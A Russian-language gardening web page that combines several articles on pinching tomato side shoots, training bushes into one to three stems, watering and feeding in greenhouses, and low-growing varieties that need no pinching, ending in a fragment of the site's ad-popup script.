3 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Схема и правила пасынкования томатов

Правила пасынкования помидоров в теплице

С появлением теплиц из поликарбоната выращивать томаты стало легче. Но уход за ними все же требует выполнения некоторых процедур. Важно пасынковать помидоры в теплице, чтобы уберечь урожай от болезней, повысить количество и качество плодов. Эта операция заключается в удалении боковых побегов, формирующихся в пазухах листьев.

Правила пасынкования помидоров в теплице

Польза

Пасынки отнимают у плодов питательные вещества, задерживают их созревание и уменьшают их количество. Мнение новичков-овощеводов, что чем пышнее куст томатов, тем больше он сможет дать плодов, ошибочно.

Татьяна Орлова (Василидченко) (канд. с.-х. наук):

Томаты формируют пасынки не в ущерб себе. За счет этих пасынков растение способно «обновляться», т.к. укореняясь, каждый пасынок замещает центральный стебель, который в процессе жизни стареет и отмирает. Этих пасынки в естественной среде обитания растения томата служат для продления его жизни и превращают томат в многолетнее растение.

Пасынкование томатов в теплице позволяет:

  • увеличить урожайность томатов, т.к. питание поступает непосредственно к плодам;
  • ускорить созревание помидоров (они поспеют на 12-16 дней раньше);
  • получить крупные спелые плоды;
  • избежать поражения гнилью за счет снижения загущенности – куст с удаленными пасынками становится более воздухопроницаемым;
  • снизить риск заболевания фитофторой за счет сокращения времени плодоношения.

Сроки

Удаление пасынков – необходимая, но болезненная для растения процедура. Минимизации ущерба способствует выполнение нескольких правил.

  1. Первую процедуру удаления пасынков проводят спустя 2 недели после высадки рассады томатов в теплицу.
  2. Частота ее проведения в дальнейшем: в период активного цветения – раз в неделю; при созревании плодов – раз в 2 недели. Главное, чтобы эта процедура была регулярной.
  3. Удаляют пасынки, достигшие высоты 3-5 см. Более мелкие побеги трудно удалить правильно – с «пеньком». Уничтожение более высоких пасынков травмирует маточное растение.
  4. Процедуру выполняют на следующее утро после обильного полива, когда стебли напитаны влагой и их проще обломить.

В теплице пасынковать помидоры лучше ранним утром: при солнечном свете раны томата быстрее подсохнут и зарубцуются.

Рекомендации

Чтобы процедура не принесла растению сильного вреда, нужно придерживаться следующих правил:

  • пасынок предпочтительнее не обрезать, а отщипывать пальцами, оставляя «пенек» длиной 10-15 мм, чтобы в этом месте вновь не образовался побег;
  • если используется режущий инструмент, то при переходе к следующему кусту его необходимо продезинфицировать раствором марганцовки или любой спиртовой настойкой;
  • при выщипывании пасынка его отклоняют в сторону, а не вверх или вниз – так меньше повреждается поверхность ствола;
  • одновременно с пасынкованием нужно оборвать все нижние ветки, соприкасающиеся с землей. Основной стебель томата должен хорошо освещаться солнцем и постоянно проветриваться;
  • все удаленные пасынки и листья необходимо сразу же вынести из теплицы и уничтожить.

Виды пасынкования

Эта процедура подразумевает не бессистемное удаление побегов-паразитов, а прежде всего формирование куста.

Различают 3 схемы формирования или, как говорят садоводы, «ведения» куста.

  1. В один стебель, когда удаляют все пасынки. Оставляют для плодоношения один главный стебель, не ограничивая его высоту. Недостаток схемы – обязательная подвязка стебля. Преимуществами этого способа являются возможность получения крупных помидоров и экономия площади теплицы (растения можно посадить близко друг к другу).
  2. В 2 стебля – кроме основного оставляют один самый крепкий пасынок рядом с первой кистью. Остальные удаляют по мере их возникновения.
  3. В 3 стебля. У такого куста один основной стебель и 2 пасынка. Первый побег оставляют возле первой цветочной кисти, далее – самый крепкий из вышерасположенных.

Существует 3 вида томатов:

  • индетерминантные – сорта с неограниченным ростом, достигающие более 2 м в высоту. Кистеобразование происходит по всей длине стебля, начиная с 8 пары листьев. Такие сорта выращивают в поликарбонатных теплицах высотой от 3 м и выше;
  • полудетерминантные (среднерослые) кусты доходят до 150 см в защищенном грунте. На главном стебле образуется до 10 кистей с завязями, после чего куст перестает расти вверх. Эти сорта хорошо развиваются как в пленочных теплицах высотой 2-2,2 м, так и в поликарбонатных;
  • детерминантные – низкорослые сорта, высота которых составляет не более 110 см. Последние цветочные завязи образуются на вершине главного стебля, и рост куста прекращается. Всего формируется 5-6 кистей.

С развитием селекции популярными стали супердетерминантные и штамбовые сорта помидоров, однако выращивать их в теплице не очень эффективно. Схемы пасынкования для каждого вида отличаются.

Высокорослые томаты

Высокорослые томаты нужно формировать в один стебель

Индетерминантные томаты, благодаря неограниченному росту, имеют 2 преимущества перед детерминантными:

  • продолжительный период плодоношения;
  • более высокую урожайность.

Высокорослые томаты формируют в один стебель, т.е. удаляют все пасынки. Убирают побеги-паразиты до появления первой плодовой кисти, которая формируется у индетерминантов над 6-8 или 10 листом.

Одновременно с пасынкованием проводят подвязку куста. Индетерминантные сорта могут достигать в высоту более 3 м, и уход за ними превращается в проблему.

Чтобы минимизировать такой недостаток, применяют ступенчатое формирование этих «великанов».

Для этого оставляют побег в пазухе 5-6 листа. Как только он наберет силу и начнет образовывать цветочные кисти, основной побег прищипывают, ограничивая его рост и развитие.

На оставленном пасынке, в свою очередь, тоже развиваются побеги. Там тоже оставляют пасынки над 5-6 листом. Первый прищипывают, как только наберет силу второй побег. Таким образом ограничивают рост куста вверх, не загущают посадки и обеспечивают постоянное появление цветочных кистей.

Метод достаточно трудоемкий, но очень эффективный. Его применяют в промышленности и на частных подворьях.

Татьяна Орлова (Василидченко) (канд. с.-х. наук):

Такой способ ведения куста томата возможен только в обогреваемых теплицах, где продолжительность эксплуатации кустов томата доходит до 8-9 месяцев. Так как постоянный перевод плодоношения на новый пасынок оттягивает время вступления в плодоношение. Растение постоянно «омолаживается», плодоносит долго, не вершкуясь.

Детерминантные сорта

Чтобы получить большое количество томатов с куста с ограниченным ростом, его формируют в 2-3 стебля. Ведь именно от количества побегов зависит урожай.

При выращивании детерминантов важно различать стебель и пасынок. Ведь если удалить верхушку стебля, куст завершкуется и перестанет расти.

Если у вас есть сомнения при определении стебля и пасынка, лучше дать новому побегу вырасти до 6 см. В этот период можно будет убедиться в его жизнеспособности.

Для детерминантных сортов существует особая схема посадки, т.к. рост кустов происходит в основном вширь. Расстояние между ними должно быть не менее 35-40 см – это обеспечивает достаточную степень проветривания кустов.

Метод Ганичкиной

Октябрина Ганичкина считает, что для увеличения периода плодоношения нужно формировать куст томата в 2 стебля, где:

  • первый – основной;
  • второй формируется из пасынка над первой цветочной кистью.

Основная кисть зреет быстро, а дополнительный побег в развитии немного отстает, следовательно, и урожай дает позже.

По другому распространенному методу пасынкования (С. Б. Гавриша) оставлять пасынок нужно под первой цветочной кистью и обрывать ниже него все листья и побеги. Этот способ стимулирует дружное созревание плодов.

Не требующие пасынкования сорта

Кроме индетерминантных, в теплице высаживают супердетерминантные и штамбовые сорта. Это оправдывает себя, когда нужно получить урожай ранних видов в короткий срок и освободить площадь для выращивания других культур.

Супердетерминантные (высотой не более 30-70 см) и штамбовые (самостоятельно формирующие куст) сорта не пасынкуют.

Однако при выращивании томатов в холодных регионах с коротким летом на них оставляют не более 4-5 стеблей. Это позволяет сократить срок достижения ими спелости, однако урожай при таком формировании куста будет ниже.

Уход за помидорами в теплице

Хороший уход обеспечит вас богатым урожаем

Самыми важными процедурами по уходу за томатами в теплице являются полив и удобрение. Эти мероприятия имеют некоторые нюансы при выращивании помидоров в защищенном грунте.

Полив

Томаты – влаголюбивые растения, однако излишним поливом можно нанести им значительный ущерб. При избытке жидкости плоды становятся водянистыми и кислыми, что значительно снижает их вкусовые характеристики.

Также губительны для растений резкие перепады влажности почвы, что заканчивается растрескиванием плодов и потерей товарного вида.

Помидоры лучше поливать редко, но обильно, не чаще раза в неделю, увлажняя почву на глубину 10-15 см. Режим полива тепличной культуры следующий:

  • до цветения – 10 л на 1 м²;
  • во время цветения – 15 л на 1 м²;
  • при созревании плодов объем полива сокращают до 8 л на 1 м².

Помидоры любят влажную почву, но плохо переносят повышенную влажность воздуха. Особенно губительно для них это явление при понижении температуры.

Важно помнить, что ночью, когда процессы фотосинтеза прекращаются и всасывание влаги замедляется, листва растений должна быть сухой. Только в этом случае можно снизить риск возникновения грибковых заболеваний.

Поливают помидоры в теплице до полудня, чтобы при испарении не образовывался конденсат на холодных стенках теплицы, как это происходит при вечернем поливе.

Теплицу обязательно проветривают для снижения влажности воздуха. Чем меньше в ней застаивается воздух, тем более здоровыми будут томаты.

Как только почва подсыхает, проводят ее рыхление для лучшей аэрации корневой системы.

Риски появления заболеваний при неправильном поливе можно значительно снизить, прислушиваясь к советам овощеводов. Чтобы уберечь листья томатов от попадания влаги на них при поливах, применяют следующие приемы:

  • капельный полив корневой системы с помощью использованных медицинских капельниц. При этом бутылка с водой подвешивается к потолку теплицы;
  • увлажнение с помощью перевернутой пластиковой бутылки, вкопанной в землю или подвешенной рядом с основным стеблем растения. В ее донышке проделывают отверстия, а в пробку вставляют иглу от шприца;
  • полив через пластиковую бутылку с обрезанным дном, помещенную в землю в непосредственной близости от ствола.

Мульчирование прикорневой зоны скошенной травой, пленкой, прокаленными опилками решает проблемы с влажностью грунта и при этом не увеличивает влажность воздуха в теплице.

Подкормки

За весь период вегетации томаты в защищенном грунте подкармливают 3 раза минеральными удобрениями:

  • за неделю до посадки вносят в почву азофоску из расчета 30-40 г на 1 м²;
  • при начале цветения первой кисти вносят азотно-фосфорные удобрения;
  • после цветения и при образовании плодов применяют азотно-калийную подкормку, причем процент азота должен быть минимальным, только для поддержания развития листьев.

В перерывах хорошо подкормить кусты зольным раствором и настоем крапивы.

Томаты хорошо реагируют на внекорневые подкормки, особенно если в их составе содержатся макро- и микроэлементы. Дважды за сезон нужно обработать томаты нитратом магния и кальциевой селитрой. Однако следует учесть, что при подкормке по листу доза удобрения должна быть в 2 раза меньше, чем рекомендуемая в инструкции.

Пошаговая инструкция и схема пасынкования томатов в теплице и открытом грунте

Эта нехитрая операция позволяет поднять урожайность овоща, так что необходимо в точности знать, как пасынковать помидоры. Такую процедуру может легко осуществить любой человек, познакомившийся с ее основными принципами.

Сущность проблемы

Пасынкование — это агротехническое мероприятие в овощеводстве, направленное на повышение урожайности. Оно предназначено для оптимального развития куста путем правильного его формирования. Принцип операции заключается в удалении лишних ветвей, которые не плодоносят, но потребляют какое-то количество полезных веществ.

Помидоры относятся к тем огородным культурам, у которых куст при развитии начинает достаточно активно ветвиться. По мере его роста из пазух листьев появляются боковые ветви, которые и считаются бесполезными элементами, отнимающими питательные вещества у плодов. Такие ветви принято называть пасынками, а их удаление — пасынкованием.

Таким образом, решая задачу, как правильно пасынковать помидоры в теплице или на огороде, можно обеспечить правильное формирование растений. На кусте остаются только плодоносящие ветви, что позволяет более полно использовать вносимые удобрения и питательные элементы из почвы. Схема пасынкования может применяться разная, что дает возможность формирования нескольких вариантов кустов.

Так ли важно удалять лишние ветви? Этот вопрос можно услышать от неопытных овощеводов. Оценить необходимость процедуры удастся по таким фактам. Пасынки на помидорах вырастают между стеблем и листом. Их появление заставляет куст активно ветвиться, а новые лишние ветки развиваются вновь и вновь. Особо заметно такое явление на высокорослых сортах (индетерминантные томаты), у которых плодоносящая ветвь образуется лишь в районе 7-11 листа, а из каждого листа может развиться пасынок. Другими словами, на одну полезную ветку может приходиться более 6 бесполезных.

В результате разрастания куста теряется баланс между зеленой и плодовой массой и зелень забирает на себя большую часть питательных веществ. Существенно замедляется вызревание плодов. Таким образом, установлено, что своевременное удаление пасынков ускоряет созревание помидоров в среднем на 12-16 дней. Сами плоды на непасынкованных кустах значительно мельче, да и общее их количество уступает обработанным томатам. Окончательно можно резюмировать — без пасынкования велик риск получения в конце сезона мелких, недозрелых помидоров.

Принципы пасынкования

При проведении пасынкования важно не навредить растению, а для этого данная операция должна проводиться в определенные сроки и по специфическим правилам. Опытные овощеводы дают такие принципиальные рекомендации:

  1. Первое пасынкование томатов в теплице или на огороде следует проводить уже на первой кисти в период цветения.
  2. Обрывать пасынки у помидор надо своевременно, пока они не выросли до 5 см. Удалять веточки можно путем прищипки, обламывания или отрывания, но не обрезания.
  3. Все пасынки, расположенные ниже ветки с завязями цветков, подлежат удалению. Если они располагаются выше цветущей ветви, то их можно оставить в расчете на возможное появление завязей.
  4. При отрывании пасынков следует стараться, чтобы выделяемый сок не попадал на руки, т. к. таким образом можно заразить другие кусты имеющимися у обрабатываемого растения заболеваниями. Само мероприятие лучше проводить в утреннее время.
  5. При проведении пасынкования надо удалить и самые нижние листья, которые касаются поверхности земли. Ствол растения должен быть сухим, освещенным солнцем и хорошо проветриваемым.
  6. Вторичное пасынкование с прищипыванием верхушки обеспечивается в июле-августе для прекращения роста куста ввысь.

Виды пасынкования

Вопрос о том, как формировать помидоры, можно решить тремя способами, в зависимости от того, сколько веток оставляется на кусте. Выделяются такие разновидности пасынкования:

  1. Схема в 1 стебель. При таком способе удалять надо все пасынки, оставляя для плодов всего 1 стебель. Томат растет быстро, и плоды становятся крупнее. Недостаток — большая высота, что требует подвязывания к опоре, в противном случае стебель сломается под тяжестью плодов.
  2. Схема в 2 стебля. В данном варианте, помимо основного стебля, на кусте оставляется 1 пасынок, а остальные удаляются. Для плодоношения выбирается самый крепкий отросток, как правило, расположенный непосредственно под первым соцветием.
  3. Куст в 3 стебля. Такое формирование томатов подразумевает сохранения основного стебля и 2 пасынков. Прищипывание проводится в таком порядке: выбирается наиболее крепкий отросток рядом с нижним соцветием, недалеко от него отыскивается еще одна достаточно крепкая веточка. Все остальные пасынки удаляются.

Пасынкование помидор в теплице чаще всего обеспечивается по первой и второй схемам. Трехветочный куст в парниках формируется редко. Вопрос, как пасынковать помидоры в открытом грунте, может решаться любым из приведенных способов в зависимости от сорта овоща.

По технологии пасынкование томатов в открытом грунте и в тепличных условиях не имеет отличий. Начальная операция проводится при появлении цветочных бутонов, пока отростки не превысили длины 4-5 см. При большем размере обрываемого пасынка возрастает вероятность заболевания растения. Следует помнить, что по мере развития овоща появляются новые ненужные ответвления и их желательно удалять каждую неделю.

Пасынкование в зависимости от сорта

По характеру роста куста все помидоры подразделяются на 2 основных типа:

  1. Индетерминантные сорта. Это достаточно высокие растения, у которых рост верхушки не ограничен. Быстро разрастаются и боковые ответвления. Если такие кусты не формировать по выбранной схеме и не проводить прищипывание верхушки, то они достигают большой высоты и значительно разрастаются во все стороны. Все это происходит в ущерб количеству и качеству плодов.
  2. Детерминантные сорта. Их основное отличие от предыдущей разновидности заключается в ограничении роста основного стебля. На его вершине образуется плодоносящая плеть, которая и останавливает рост растения в высоту. Таким образом, количество завязей после появления верхнего соцветия больше не увеличивается, а потому очень важно правильно выбрать самую плодовитую ветвь.

На вопрос, как обрывать пасынки, можно ответить следующим образом: к разным сортам требуется специфический подход с учетом особенностей их естественного формирования. Индетерминантные помидоры можно пасынковать по любой схеме, но чаще всего применяется схема в 1 стебель. Важно своевременно прищипывать помидоры в теплице (верхушку), не допускания чрезмерного роста в высоту.

При выращивании в парнике и использовании схемы в 1 стебель применяется обычно такая технология. Оставленный стебель по мере роста постепенно опускается к земле и укладывается на ее поверхности. Появляющиеся новые пасынки постоянно удаляются. На основных стеблях оставляется 8-10 кистей. Наиболее распространенные сорта — Мажор, Счастье, Спрут.

Формирование детерминантных томатов вызывает определенные сложности. Для правильного выбора наиболее качественного стебля рекомендуется придерживаться таких принципов:

  • чаще всего используется схема с 2 или 3 стеблями;
  • пасынки обрываются при достижении длины порядка 4 см, когда можно оценить их жизнеспособность;
  • если есть сомнение в правильности выбора, то лучше временно оставить несколько ветвей и удалять ненужные уже после начала цветения;
  • при выращивании в открытом грунте допускается обойтись без пасынкования, т. к. кусты можно расположить на достаточном расстоянии друг от друга;
  • на оставленном стебле сохраняется 6-8 соцветий.

Посадка этих сортов также требует особого подхода. С учетом активного разрастания куста вбок расстояние между растениями обеспечивается порядка 30-35 см. Наиболее распространенные детерминантные сорта — Ажур, Кукла.

В последнее время выведены супердетерминантные сорта, которые требуют особой осторожности в пасынковании. Кроме того, популярность приобрели современные сорта томатов без пасынкования. На таких помидорах обрывание пасынков проводится только 1 раз и до первой кисти. При последующем росте растения процедура уже не осуществляется. Можно отметить такие томаты этого типа — Гаврош, Акварель, Москвич, Витязь, Ракета, Виконте, Ямал, Аляска, Малиновое чудо, Белый налив (241), Вершок.

Осуществление пасынкования

Удаление пасынков обычно обеспечивается руками без использования режущего инструмента. При применении ножей появляется риск переноса инфекции с одного куста на другой и появления раны на месте среза. Однако при большом тепличном хозяйстве обойтись без инструмента не удается. В принципе, срезать пасынки можно, но с соблюдением мер предосторожности.

Перед тем, как пасынковать помидоры в теплице (пошагово) путем срезания, необходимо запомнить следующее:

  1. Производится заточка инструмента до состояния острой бритвы.
  2. Осуществляется дезинфекция режущей части раствором хлорной извести или марганцовки.
  3. Быстрым и точным движением срезается пасынок на расстоянии 10-15 мм от основания, не повреждая основную ветвь.
  4. Срезаются все пасынки на одном кусте, причем удаленные стебли сразу складываются в отдельную емкость и выносятся из парника, что позволяет избежать гниения и распространения инфекции.
  5. Новая дезинфекция инструмента необходима. Данная операция проводится каждый раз при переходе на новый куст.

При обеспечении нужного ухода за помидорами важно четко отличать пасынок от плодоносящего стебля. Выделяются такие важнейшие отличия:

  • на пасынке сразу заметны листки в то время, как на стебле наблюдаются цветочные завязи;
  • пасынок растет из пазухи листьев, а плодоносящая плеть ответвляется только от стебля;
  • наиболее наглядна разница при длине пасынка порядка 4-5 см.

Пасынкование справедливо считается важным агротехническим мероприятием при выращивании помидоров как в теплицах, так и на огороде. Эта простая, но кропотливая работа требует предельной внимательности и осторожности, но зато пасынкованный томат дает обильный урожай и вкусные, полноценные плоды.

Как пасынковать помидоры в теплице. Схема и пошаговое описание

Здравствуйте, дорогие огородники! Сегодня вновь будем говорить про огород. А именно про пасынкование растений томатов в теплице. Но не думайте, что данные методы нельзя применять на улице. Можно. Ведь самое главное сделать это. Иначе можно остаться без урожая или получить мелкие плоды. Да их может быть много. Но толку от них не будет..

Совсем недавно я писал про сорта семян томатов, огурцов, перцев. Даже описывал, как их посадить и ухаживать за ними. Но про то, как пасынковать я нигде не упоминал. Хотя эта процедура очень важна. Знаю, что есть сорта, растения которых не пасынкуются. В основном это небольшие кустики детерминантного типа высотой не более 50 см. И плоды у них не очень крупные. Поэтому с такими эту процедуру не проводят.

Честно скажу, что совершено не люблю такую возню. Подвязка, обрывание пасынков и листьев. Всё это до такой степени муторно, что предпочёл бы просто воткнуть семечко в землю, а через какой-нибудь период собрать уже готовый урожай. Но такое бывает только в сказках и то не во всех! Поэтому давайте рассмотрим, как правильно это нужно делать.

Как правильно пасынковать помидоры (томаты) в теплице

Для начала нужно понять, что такое пасынкование? Могу сказать, что это процесс, который направлен на повышение урожайности. Во время действий удаляются лишние ветви, которые не плодоносят, но высасывают из растения большое количество полезных веществ. При помощи данной процедуры вы можете правильно сформировать куст в один, два или три стебля. Но в тепличных условиях последний почти не используется.

Когда я только начинал садить сам огород, то мне очень нравились кусты с хорошо развитой зеленой массой. Я считал, что такой может дать отличный урожай и поэтому от пасынкования отказывался. Поэтому урожая у меня практически не было. Так как такие кусты отдают все свои силы наращивание листвы и пасынков, а не плоды.

Помните, что огороднику главное получить отличный урожай. Поэтому не стоит жалеть лишние отростки. Их необходимо систематически и безжалостно удалять!

Обрывать пасынки начинают через 2 – 2,5 недели после посадки томатов в теплицу. Первые из них появляется под первой цветочной ветвью . И с этого момента начинается осмотр кустов и их пасынкование 1 – 2 раза в неделю. Да, ненужные отростки растут очень быстро! Оптимальная длина лишних веточек при этом составляет 3 – 5 см. Допускать их рост в длину более 5 см не следует, так как они успеют высосать из растения огромное количество питательных веществ. В редких случаях пасынки могут появляться даже на помидорной рассаде. Их нужно удалить перед посадкой.

Со всеми высокорослыми помидорами необходимо делать эту процедуру. К этим, так называемым, индетерминантным, сортам относятся помидоры, рост которых неограничен. Они могут достигать в высоту более 2 м. Эта операция включает в себя следующие шаги:

1. Количество стеблей. Обычно высокорослые, особенно крупноплодные, в теплице выращивают в один стебель. Если сорт предусматривает выращивание в два стебля и способен выдержать будущий урожай, то у него нужно оставить один самый мощный пасынок, который образуется у первой плодоносной ветки.

Чем больше плодов на кусту, тем меньше их размер.

2. Удаление нижних пасынков . Удалять появляющиеся пасынки под нижними листьями нужно обязательно. Урожая они не дадут, но препятствуют проветриваемости и прохождению солнечных лучей в теплице.

3. Удаление пасынков по мере роста растения. В период вегетации кустов томатов пасынки в пазухах листьев будут появляться постоянно. Их надо своевременно обрывать.

Низкорослые или детерминантные сорта имеют ограниченную точку роста. Это означает, что такие помидоры вырастают до определенной длины, после чего рост стебля прекращается, а вся их энергия идет на наращивание плодов. Высота среднерослых детерминантов составляет обычно до 1,5 – 1,7 м, а низкорослых – до 80 см.

Детерминантов со средним ростом в теплице выращивают в два стебля. При желании можно оставить и третий, не удаляя пасынок у второй плодоносной ветви. Большее количество стволов для этих сортов не рекомендуется, так как страдает урожайность, ведь плоды мельчают. Ниже приведена схема формирования и какие лишние отростки лучше убирать.

Низкорослые кусты можно при необходимости пасынковать, оставляя от 4 до 5 стеблей. Некоторые садоводы вместо пасынкования прибегают к их прищипыванию. После того как на пасынках завяжутся по две плодовых кисти, их нужно ограничить в росте прищипкой.

У среднерослых сортов эти отростки нужно убрать, а вот с низкоросликами поступают иначе: либо их просто оставляют, либо их медленно отгибают, чтобы не сломать, аккуратно пришпиливают к земле и присыпают сверху грунтом. Пасынки укоренятся и дадут новые кусты. Этот прием хорош в том случае, если было высажено мало рассады. Новые кустики в тепличных условиях быстро вырастут и дадут урожай немного позже маточных. Такой прием подразумевает более свободную схему посадки.

Удаление появляющихся пасынков. Как и в предыдущем случае все лишние побеги у среднерослых отламывают, а у низкорослых раскидистых оставляют, так как излишняя формировка негативно скажется на их урожайности.

Существует несколько простых общих правил пасынкования, которые помогут садоводу безболезненно для кустов провести эту операцию:

  • Чаще всего пасынки отламывают так, чтобы оставался пенек длиной в 2 – 3 мм. При таком удалении отростков снижается риск их повторного появления на тех же местах. Убирать пасынки у помидор нужно с особой аккуратностью, стараясь не повредить стебли, листья и соседние побеги растений.
  • Если посадки помидоров в теплице запущены, то пасынки могут возникать даже на листьях. Если процедура проводится крайне редко, удалять отростки нужно постепенно, так как растения испытают огромный стресс и даже могут заболеть.
  • Если все-таки веточкам удалось развить толстые стебельки, и при их удалении открылись довольно большие ранки на стеблях томатов, то их нужно сразу же присыпать древесной золой.
  • Каждый раз после окончания формирования все оборвыши нужно собрать с тепличных грядок и выбросить.

Какие томаты не нужно пасынковать

Чтобы получить большой урожай, огородники формируют куст при помощи пасынкования. Но для того, кто занимается этим впервые, это довольно сложно, ведь необходимы определенные знания и опыт. Новичку в этом деле весь процесс кажется довольно не простым. Поэтому им лучше постараться выбирать сорта томатов, которые не требуют этого действие.

В основном это помидоры низкорослые. Они не дают множество отростков-стеблей, но могут показать высокую урожайность. К тому же такие растения проще переносят перепады температуры и несоблюдение режима влажности воздуха.

Но все-таки, выбирая для своей теплицы помидоры без пасынкования, следует исходить из особенностей сорта и его возможности произрастать именно в вашем регионе. Предпочтение лучше отдать детерминантному сорту. Существуют даже томаты с обозначением «супердетерминантные» виды. Они имеют, как правило, более ранний срок созревания. Высота таких растений, обычно, не больше 30 см.

Растения с высокими кустами нуждаются в подвязывании к заранее установленным опорам. Также требуется подвязывание томатов с повышенной урожайностью и обильно плодоносящими кустами, которые могут слишком низко пригнуться к земле, а в некоторых случаях получить надлом стебля.

Непасынкующиеся сорта помидор обычно раннеспелые. Первые плоды у них созревают уже на 80-100 день после их высаживания в почву. Такие сорта характеризуются дружным созреванием плодов. Вес одного помидора колеблется от 80 гр. до 1 кг.

Как пасынковать помидоры в открытом грунте

Удаляют пасынки обычно руками без использования режущего инструмента. Если применять нож, то появляется риск переноса инфекции с одного куста на другой и появления раны на месте среза. Однако при большом количестве посадок в открытом грунте обойтись без инструмента не удается. В принципе, срезать пасынки можно, но с соблюдением мер предосторожности.

Перед тем, как уберать отростки помидор в открытом грунте или теплице путем срезания, необходимо выполнить следующие шаги:

1. Заточите инструмент до состояния острой бритвы.

2. Продезинфецируйте режущую часть раствором хлорной извести или марганцовки.

3. Быстрым и точным движением срежьте пасынок на расстоянии 10-15 мм от основания, не повреждая основную ветвь.

4. Срезаются все пасынки на одном кусте, причем удаленные стебли сразу складываются в емкость (ведро). Это позволит избежать гниения и распространения инфекции.

5. Дезинфекция инструмента перед каждым новым кустом.

6. При обеспечении нужного ухода за помидорами важно четко отличать пасынок от плодоносящего стебля.

Пасынкование справедливо считается важным агротехническим мероприятием при выращивании помидоров как в открытом грунте, так и в теплицах. Эта простая, но кропотливая работа требует предельной внимательности и осторожности, но зато очищенный от ненужной отросли томат дает обильный урожай и вкусные, полноценные плоды.

Сорта низкорослых помидор без пасынкования

Чтобы облегчить себе задачу и не тратить время на эту мучительную процедуру, предлагаю вам использовать семена низкорослых помидор. Как правило эта процедура им совершенно не нужна, так как у них нет такого количества отростков, чтобы они мешали росту плодов.

Домашний разносол. Среднеранний низкорослый очень урожайный сорт. Растение детерминантное, компактное, высотой 40-50 см. Плоды красные, округло-цилиндрические, гладкие, плотные, с хорошей лежкостью. Масса томатов 100-150 г. Вкусны в свежем виде, пригодны для любых видов домашней переработки. Благодаря плотной консистенции мякоти замечательно подходят для цельноплодного консервирования и засолки. Хорошо транспортируются и хранятся.

Тяжеловес Сибири. Раннеспелый крупноплодный сорт для открытого грунта. Достоинством сорта является крупноплодность в сочетании с низкорослым типом куста (высотой 40-60 см). Плоды густо-розового цвета уплощенно-сердцевидной формы, массой до 500 г. Томаты вкусные, великолепно подходят для салата и зимних заготовок. Возможно выращивание сорта без пасынкования, но для получения более крупных плодов требуется частичное пасынкование.

Канопус. Крупноплодный, среднеспелый сорт сибирской селекции. Растение низкорослое, высотой 55-60 см, выращивается в открытом грунте (без пасынкования) и в пленочных теплицах (при формировании куста в 2 стебля). Плоды овальной формы, крупные (до 600 г), очень лежкие. Использование универсальное. Более мелкие плоды прекрасно подходят для цельноплодного консервирования. Сорт довольно устойчив к грибковым заболеваниям и неблагоприятным погодным условиям.

Бурковский ранний. Растение низкорослое, не требует пасынкования. Плоды красные, округлой формы, массой до 150 г., первые до 200гр, высоких вкусовых качеств. К его неоспоримым достоинствам относится также стабильно высокая урожайность (до 3кг с куста), кисти завязываются после каждого листа, начиная с пятого, даже при неблагоприятных погодных условиях.

Северная малютка. Детерминантный, низкорослый сорт для выращивания в открытом грунте, высота растений до 55см, ультраскороспелый (80-95 дней), плодоношение дружное и обильное. Плоды округлые, ярко-красного цвета с массой 40 — 65г. Холодостойкий, детерминантный, не требует пасынкования, за счёт скороспелости «уходит» от поражения фитофторозом. Прекрасно подходит для потребления в ранние сроки и консервирования.

Золотое руно. Раннеспелый сорт для открытого грунта и пленочных теплиц. Период от всходов до начала созревания 85-98 дней. Растение высотой 45-55 см. Плоды удлиненно-овальные, гладкие, оранжевые. Масса 90-100 г. Ценится за устойчивость растений к комплексу болезней, высокую урожайность и товарность плодов. Сорт салатный и для цельноплодного консервирования.

Теперь вы знаете, как производить пасынкование томатов как в теплице, так и в открытом грунте. Если не хотите этого делать , то приобретите семена низкорослых помидор. А можно посадить и те, и другие. Так у вас будет разнообразие плодов и вы точно будете знать, какие вам больше понравились. А я с вами прощаюсь, до встречи!

Пошаговая схема пасынкования помидор в теплице

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
